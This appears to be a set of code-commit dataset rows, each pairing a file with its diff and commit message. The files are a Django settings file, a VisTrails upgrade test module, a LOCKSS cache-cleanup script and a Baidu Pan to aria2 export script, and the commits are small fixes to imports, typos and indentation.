'format': '%(asctime)s [%(levelname)s] - [%(name)s - %(module)s - %(lineno)s] - %(message)s',
'datefmt': '%m-%d-%Y %H:%M:%S'
},
},
'handlers': {
'django_default': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'log/django.log',
'formatter': 'standard',
'maxBytes': 1024*1024*5,
'backupCount': 5
},
'console': {
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
'digest': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'log/bot/daily_digest.log',
'formatter': 'standard',
'maxBytes': 1024*1024*5,
'backupCount': 5
},
'notifications': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'log/bot/notification.log',
'formatter': 'standard',
'maxBytes': 1024*1024*5,
'backupCount': 5
}
},
'loggers': {
'django': {
'handlers': ['django_default', 'console'],
'propagate': True,
},
'bot.digest': {
'handlers': ['django_default', 'digest', 'console'],
'level': 'DEBUG',
'propagate': True,
},
'bot.notifications': {
'handlers': ['django_default', 'notifications', 'console'],
'level': 'DEBUG',
'propagate': True,
}
},
}
# Application definition
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'api.apps.ApiConfig',
'rest_framework_docs',
'bot',
'djcelery',
'embed_video',
'jet',
'django.contrib.admin',
'django_user_agents',
'django_filters',
'rest_framework.authtoken'
]
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'spacelaunchnow.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR + '/templates/'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'spacelaunchnow.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# CELERY STUFF
BROKER_URL = "amqp://spacelaunchnow:spacelaunchnow@localhost:5672/vhost_spacelaunchnow"
CELERY_ACCEPT_CONTENT = ['json']
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'UTC'
# Name of cache backend to cache user agents. If it not specified default
# cache alias will be used. Set to `None` to disable caching.
USER_AGENTS_CACHE = None
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'localhost'
EMAIL_PORT = 25
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = False
DEFAULT_FROM_EMAIL = 'Webmaster <webmaster@spacelaunchnow.me>'
|
Python
| 0.000001
|
@@ -4006,74 +4006,8 @@
%0A%5D%0A%0A
-EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'%0A%0A
MIDD
|
e635d6a1c4ca8c138a5bd288250f94bcd82bb8a8
|
Remove unnecessary imports.
|
vistrails/tests/resources/upgrades/init.py
|
vistrails/tests/resources/upgrades/init.py
|
from vistrails.core.modules.vistrails_module import Module
from vistrails.core.modules.config import IPort, OPort
from vistrails.core.upgradeworkflow import UpgradeWorkflowHandler, \
UpgradePackageRemap, UpgradeModuleRemap
class TestUpgradeA(Module):
_input_ports = [IPort("aaa", "basic:String")]
_output_ports = [OPort("zzz", "basic:Integer")]
class TestUpgradeB(Module):
_input_ports = [IPort("b", "basic:Integer")]
_modules = [TestUpgradeA, TestUpgradeB]
_upgrades = {"TestUpgradeA":
[UpgradeModuleRemap('0.8', '0.9', '0.9', None,
function_remap={'a': 'aa'},
src_port_remap={'z': 'zz'}),
UpgradeModuleRemap('0.9', '1.0', '1.0', None,
function_remap={'aa': 'aaa'},
src_port_remap={'zz': 'zzz'})]}
|
Python
| 0.000001
|
@@ -154,58 +154,8 @@
ort
-UpgradeWorkflowHandler, %5C%0A UpgradePackageRemap,
Upg
|
5f13d0a73a040b3a78842a8bae8dbf2df6e58d05
|
Fix typo and formating of warning message for No AUID entries.
|
test/frameworks/clean_up_daemon/clean_cache.py
|
test/frameworks/clean_up_daemon/clean_cache.py
|
#!/usr/bin/env python
# $Id: clean_cache.py,v 1.5 2011-04-12 19:01:19 barry409 Exp $
# Copyright (c) 2011 Board of Trustees of Leland Stanford Jr. University,
# all rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# STANFORD UNIVERSITY BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Except as contained in this notice, the name of Stanford University shall not
# be used in advertising or otherwise to promote the sale, use or other dealings
# in this Software without prior written authorization from Stanford University.
import optparse
import ConfigParser
import os
import sys
import urllib2
import fix_auth_failure
import lockss_daemon
__author__ = "Barry Hayes"
__maintainer__ = "Barry Hayes"
__version__ = "1.0.1"
class _SectionAdder(object):
"""Wrap a python configuration section around a file that doesn't
have one."""
def __init__(self, section, fp):
self.section_done = False
self.section = section
self.fp = fp
def readline(self):
if not self.section_done:
self.section_done = True
return '[%s]' % self.section
else:
return self.fp.readline()
class IdFileException(Exception):
pass
def _parser():
"""Make a parser for the arguments."""
parser = optparse.OptionParser(
description='Move cache directories on a LOCKSS daemon')
parser.add_option('-u', '--user', default='lockss-u')
parser.add_option('-p', '--password', default='lockss-p')
parser.add_option('-v', '--verbose', dest='verbose', action='store_true',
default=False)
parser.add_option('-q', '--quiet', dest='verbose', action='store_false')
parser.add_option('-f', '--force', dest='verify', action='store_false',
help='ignore auids not present on the daemon, '
'never prompt')
parser.add_option('-i', '--verify', dest='verify', action='store_true',
default=False, help='prompt before each move')
parser.add_option('--commands', action='store_true', default=False,
help='print mv commands, but do not move files')
parser.add_option('-d', '--directory', default='.',
help='the daemon directory where ./cache is '
'(default: \'.\')')
parser.add_option('--dest', default='deleted',
help='where under the daemon directory the cache '
'entries are moved to (default: \'deleted\')')
return parser
def _process_args():
parser = _parser()
(options, arguments) = parser.parse_args()
if arguments != []:
parser.error('There should be no arguments. Try --help')
return options
def _auid(cache_dir):
"""Return the AUID for the given cache dir."""
# If the #au_id_file isn't present, the daemon doesn't list the
# directory in the table, so no need to check if the file exists.
path = os.path.join(cache_dir, '#au_id_file')
f = open(os.path.join(path))
try:
auid = None
for line in f.readlines():
line = line.strip()
if line and line[0] != '#':
if auid is None:
auid = line
else:
raise IdFileException('%s contains more than one line.'
% path)
if auid is None:
raise IdFileException('%s contains no AUID.' % path)
finally:
f.close()
return auid
def main():
options = _process_args()
src = options.directory
local_txt = os.path.join(src, 'local.txt')
if (not os.path.isdir(os.path.join(src, 'cache'))
or not os.path.isfile(local_txt)):
raise Exception('%s doesn\'t look like a daemon directory. '
'Try --directory.' % src)
config = ConfigParser.ConfigParser()
local_config = open(local_txt)
config.readfp(_SectionAdder('foo', local_config))
port = config.get('foo', 'org.lockss.ui.port')
fix_auth_failure.fix_auth_failure()
client = lockss_daemon.Client('127.0.0.1', port,
options.user, options.password)
repos = client._getStatusTable( 'RepositoryTable' )[ 1 ]
no_auid = [r for r in repos if r['status'] == 'No AUID']
if no_auid:
print 'Warning: These cache directories has no AUID:'
for r in no_auid:
print r['dir']
deleted = [r for r in repos if r['status'] == 'Deleted']
for r in deleted:
r['auid'] = _auid(os.path.join(src, r['dir']))
deleted.sort(key=lambda r: r['auid'])
move_all = False
if options.verbose:
if deleted:
print 'These AUs have been deleted on the daemon:'
for r in deleted:
print r['auid']
if options.verify:
move_all = raw_input('move all [y]? ').startswith('y')
else:
print 'No deleted AUs.'
verify_each = options.verify and not move_all
dst = os.path.join(options.directory, options.dest)
for r in deleted:
dir = r['dir']
if not verify_each or \
verify_each and \
raw_input('move %s [n]? ' % r['auid']).startswith('y'):
src_r = os.path.join(src, dir)
dst_r = os.path.join(dst, dir)
if options.commands:
print "mv %s %s # %s" % (src_r, dst_r, r['auid'])
else:
os.renames(src_r, dst_r)
if __name__ == '__main__':
main()
|
Python
| 0.999994
|
@@ -46,9 +46,9 @@
v 1.
-5
+6
201
@@ -63,11 +63,11 @@
19:0
-1:1
+2:0
9 ba
@@ -5326,17 +5326,18 @@
ories ha
-s
+ve
no AUID
@@ -5391,16 +5391,30 @@
r%5B'dir'%5D
+%0A print
%0A%0A de
|
a2b19e7fd6b0004e4fa18b6d1b20f7347ca1964c
|
Fix wrong indentation
|
command/export.py
|
command/export.py
|
#!/usr/bin/env python2
# coding=utf-8
import json
import urllib2
import logging
import base64
from config import global_config
from bddown_core import Pan, GetFilenameError
def export(links):
for link in links:
pan = Pan(link)
count = 1
while count != 0:
link, filename, count = pan.info
if not filename and not link:
raise GetFilenameError("无法获取下载地址或文件名!")
export_single(filename, link)
def export_single(filename, link):
jsonrpc_path = global_config.jsonrpc
jsonrpc_user = global_config.jsonrpc_user
jsonrpc_pass = global_config.jsonrpc_pass
if not jsonrpc_path:
print "请设置config.ini中的jsonrpc选项"
exit(1)
jsonreq = json.dumps(
[{
"jsonrpc": "2.0",
"method": "aria2.addUri",
"id": "qwer",
"params": [
[link],
{
"out": filename,
"header": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
"\r\nReferer:http://pan.baidu.com/disk/home"
}]
}]
)
logging.debug(jsonreq)
try:
request = urllib2.Request(jsonrpc_path)
if jsonrpc_user and jsonrpc_pass:
base64string = base64.encodestring('%s:%s' % (jsonrpc_user, jsonrpc_pass)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
request.add_data(jsonreq)
req = urllib2.urlopen(request)
except urllib2.URLError as urle:
print urle
raise JsonrpcError("jsonrpc无法连接,请检查jsonrpc地址是否有误!")
if req.code == 200:
print "已成功添加到jsonrpc\n"
class JsonrpcError(Exception):
pass
|
Python
| 0.810919
|
@@ -1314,9 +1314,16 @@
ss:%0A
-%09
+
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.